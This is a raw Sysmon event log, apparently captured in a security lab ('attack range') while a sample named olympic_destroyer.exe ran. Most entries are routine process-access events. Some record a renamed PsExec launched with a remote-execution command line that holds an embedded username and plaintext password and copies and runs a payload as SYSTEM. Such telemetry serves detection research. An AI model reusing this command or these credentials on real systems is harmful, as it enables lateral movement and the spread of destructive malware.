10:57:04.367{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1300-6216-EB05-000000003802}6148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.352{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.352{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.352{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.352{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.352{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-EB05-000000003802}6148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.352{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1300-6216-EB05-000000003802}6148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000292149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.237{C8EA50B7-1300-6216-EB05-000000003802}6148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000292148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.267{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.267{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.267{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.267{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.267{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.267{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.267{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.252{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-EC05-000000003802}6488C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.252{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.236{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.236{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:04.220{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.183{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-EA05-000000003802}6412C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.183{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1300-6216-EA05-000000003802}6412C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.168{C8EA50B7-1300-6216-EA05-000000003802}64126860C:\Windows\system32\conhost.exe{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.120{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1300-6216-EA05-000000003802}6412C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:04.099{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1300-6216-EA05-000000003802}6412C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000292131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.487{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53318- 10341000x8000000000000000292130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.999{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.999{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.999{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.999{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.983{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FF-6216-E905-000000003802}6720C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 